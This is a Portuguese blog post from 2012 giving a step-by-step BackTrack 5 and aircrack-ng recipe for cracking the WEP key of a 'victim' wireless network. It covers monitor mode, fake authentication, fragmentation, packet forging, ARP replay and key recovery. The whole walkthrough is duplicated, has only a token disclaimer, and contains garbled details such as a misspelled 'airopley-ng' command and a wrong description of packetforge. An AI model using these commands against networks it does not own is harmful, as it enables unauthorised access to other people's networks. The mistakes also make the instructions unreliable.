sexta-feira, 13 de julho de 2012

Quebrando senha web com BackTrack 5

"
Faça download do BackTrack 5 aqui depos grave e de boot no dvd e vai pedir senha e login

login: root
senha: toor
depois digite (startx) sem parentese para iniciar o BackTrack 5

Abra o console para digitar os comandos

1: airmon-ng (esse comando faz com que o bt5 reconheça sua placa de rede)
2: airmon-ng start wlan0 (esse comando faz com que fique em modo monitor)
3: airodump-ng mon0 (esse comando faz com que ele procure as redes ao seu redor)

abra outro console

4: airodump-ng --bssid (bssid) --channel x --ivs -w nome rede mon0 (esse comando faz com que vc monitore a rede da vitima)

abra outro console

5: aireplay-ng -5 -b (bssid) mon0 (espere ele vai pedir para você digitar y (yes) depois enter. Com esse comando você pega os pacotes da vitima)

abra outro console

6: aireplay-ng -1 1 -a (bssid) mon0(esse comando captura os pacotes criptografados da vitima)

abra outro console

7: packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y (fragments) -w arpy(esse comando captura os date da vitima)

abra outro console

8: airopley-ng -3 -r arpy -b (bssid) mon0

abra outro console

9: aircrack-ng nome rede-01.ivs(aqui é o final e a hora de você saber a senha da rede wep. Eu aconselho a você esperar pelo menos ate 10.000 pacotes para pegar a senha, mas se você quiser com 5.000 pacotes é aceitável).

Fonte: Desconhecido
Não mim responsabilizo pelos seus atos teste em sua rede. "
Faça download do BackTrack 5 aqui depos grave e de boot no dvd e vai pedir senha e login

login: root
senha: toor
depois digite (startx) sem parentese para iniciar o BackTrack 5

Abra o console para digitar os comandos

1: airmon-ng (esse comando faz com que o bt5 reconheça sua placa de rede)
2: airmon-ng start wlan0 (esse comando faz com que fique em modo monitor)
3: airodump-ng mon0 (esse comando faz com que ele procure as redes ao seu redor)

abra outro console

4: airodump-ng --bssid (bssid) --channel x --ivs -w nome rede mon0 (esse comando faz com que vc monitore a rede da vitima)

abra outro console

5: aireplay-ng -5 -b (bssid) mon0 (espere ele vai pedir para você digitar y (yes) depois enter. Com esse comando você pega os pacotes da vitima)

abra outro console

6: aireplay-ng -1 1 -a (bssid) mon0(esse comando captura os pacotes criptografados da vitima)

abra outro console

7: packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y (fragments) -w arpy(esse comando captura os date da vitima)

abra outro console

8: airopley-ng -3 -r arpy -b (bssid) mon0

abra outro console

9: aircrack-ng nome rede-01.ivs(aqui é o final e a hora de você saber a senha da rede wep. Eu aconselho a você esperar pelo menos ate 10.000 pacotes para pegar a senha, mas se você quiser com 5.000 pacotes é aceitável).

Fonte: Desconhecido
Não mim responsabilizo pelos seus atos teste em sua rede. 

Quer continuar por dentro das novidades do Espaço Livre? Siga o nosso perfil noTWITTER, curta a nossa página noFACEBOOK.

1 comentários: